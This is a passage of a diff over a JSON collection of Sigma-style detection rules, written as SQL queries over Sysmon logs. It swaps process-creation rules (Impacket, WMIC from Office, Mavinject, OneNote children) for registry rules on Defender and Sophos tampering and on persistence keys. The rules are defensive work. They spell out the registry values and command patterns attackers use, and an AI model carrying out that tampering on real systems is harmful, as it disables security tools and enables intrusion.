FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_script_wscript_shell_cli.yml" + "filename": "registry_set_sophos_av_tamper.yml" }, { - "title": "PrintBrm ZIP Creation of Extraction", - "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "title": "Potential Persistence Via AutodialDLL", + "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "status": "experimental", - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. 
PrintBrm.exe should not be run on a normal workstation.", - "author": "frack113", + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_printbrm.yml" + "filename": "registry_set_persistence_autodial_dll.yml" }, { - "title": "HackTool - Potential Impacket Lateral Movement Activity", - "id": "10c14723-61c7-4c75-92ca-9af245723ad2", - "status": "stable", - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "title": "Disable Windows Defender Functionalities Via Registry Keys", + "id": "0eb46774-f1ab-4a74-8238-1155855f2263", + "status": "experimental", + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND Details = 'DWORD 
(0x00000000)')))" ], - "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" + "filename": "registry_set_windows_defender_tamper.yml" }, { - "title": "Suspicious WMIC Execution Via Office Process", - "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "title": "Potential Attachment Manager Settings Associations Tamper", + "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", "status": "experimental", - "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "author": "Vadim Khrykov, Cyb3rEng", + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' 
ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND Details = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (Details LIKE '%.zip;%' ESCAPE '\\' OR Details LIKE '%.rar;%' ESCAPE '\\' OR Details LIKE '%.exe;%' ESCAPE '\\' OR Details LIKE '%.bat;%' ESCAPE '\\' OR Details LIKE '%.com;%' ESCAPE '\\' OR Details LIKE '%.cmd;%' ESCAPE '\\' OR Details LIKE '%.reg;%' ESCAPE '\\' OR Details LIKE '%.msi;%' ESCAPE '\\' OR Details LIKE '%.htm;%' ESCAPE '\\' OR Details LIKE '%.html;%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" + "filename": "registry_set_policies_associations_tamper.yml" }, { - "title": "File Download Using Notepad++ GUP Utility", - "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "title": "Custom File Open Handler Executes PowerShell", + "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the abuse of custom file open handler, executing powershell", + "author": "CD_R0M_", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\' AND Details LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_gup_download.yml" + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" }, { - "title": "Wab Execution From Non Default Location", - "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "title": "Registry Persitence via Service in Safe Mode", + "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", "status": "experimental", - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.execution" + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'Setvalue' AND (TargetObject LIKE 
'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND Details = 'Service') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" + "filename": "registry_set_add_load_service_in_safe_mode.yml" }, { - "title": "Mavinject Inject DLL Into Running Process", - "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "title": "Disable Macro Runtime Scan Scope", + "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "status": "experimental", - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE 
'%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" + "filename": "registry_set_disable_macroruntimescanscope.yml" }, { - "title": "Suspicious Microsoft OneNote Child Process", - "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "title": "Windows Defender Service Disabled", + "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "status": "experimental", - "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "File located in the AppData folder with trusted signature" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR 
CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND Details = 'DWORD (0x00000004)')" ], - "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" + "filename": "registry_set_disable_windows_defender_service.yml" }, { - "title": "Net WebClient Casing Anomalies", - "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", - "status": "experimental", - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. 
nEt.WEbCliEnT) string as used in obfuscation techniques", + "title": "Suspicious Printer Driver Empty Manufacturer", + "id": "e0813366-0407-449a-9869-a2db1119dc41", + "status": "test", + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Unknown" + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE 
'%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE 
'%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE 
